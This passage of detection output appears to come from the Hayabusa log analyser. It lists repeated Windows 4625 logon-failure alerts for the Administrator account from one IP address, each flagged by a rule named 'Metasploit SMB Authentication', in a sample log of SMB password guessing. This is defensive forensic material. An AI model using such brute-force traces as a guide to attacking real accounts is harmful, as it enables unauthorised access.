Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yQqfSKOyKLSILPrQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.374 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k7oAI2q6YCu8btlK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.552 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KniVwndqE9aC6cIM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.610 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FgQbvpfuS11matJi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.702 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R9TwJS4B9ZaDD2Ze : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.702 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IPUuoopOnwlTjlTP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.749 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9VEyOUuiOi8Q3JBJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.806 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pGGGazMTBBfrppDZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.862 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NKO4V35Y2qPEB59W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.919 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WxVdhpR7ZnAluurU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.964 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gZjAZb9bQKZjwL8u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.066 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aKyLX5ChpgBuFEbr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.066 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 49t2xJvH2yHcyHle : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.112 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sg9Z6Pyix2UkMolr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0NN2olYn97ZoYCja : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.210 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S98j54bDGsz0k6g9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.249 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XxFEw9s0nnEQGzUN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.284 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wSswFHFSlqcQd47k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.342 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7icutlVIWSLZJszQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DSwyugYn0n3i5f25 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.440 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RmBaLCUcR7TmixTy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.473 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1oOBz2NQSCdTwa7V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O4tU1LPF5DRW9Vm0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.582 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.633 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SRsSNqPYruWBzp2n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.633 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3JZhBLzt4af1VtCU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.684 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dFLZIKSDBvBaWq59 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.729 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: guAG4ZTFMjZAxp1A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yd04xsSIdiczICeG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.865 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cx3i1URKPhC6KWI7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.865 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Npc6IS27HsWP3JA9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.914 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KIBnr0eZ1bHHGokW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.963 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6gTTrUVjpPU80LlC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.013 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FZlmUbCNAJga24JH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.078 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zf3aSGBMe97VujaH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.136 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8bx7ZM77aDG7y6Lh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BnHHAClMwyqA3TTI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 00ibRrYvnFt5w9X0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VglTKbnLVFvHZHzQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.358 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3NwX0sDFwHQG7Tkq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.358 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3mMx3M1zurKMBzyj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.413 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sH7b8P0O0uea3PlN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJcrTyBPuX0TcvOT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.530 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kwuZIQAL3BmJnPsJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.574 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lxgAfsnH6YWLRD0a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.620 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ttBOjzmEBjr9W2QW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FPDKGGYkJQeWgtUf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.732 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nSoJWqS6YPbpCiBf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 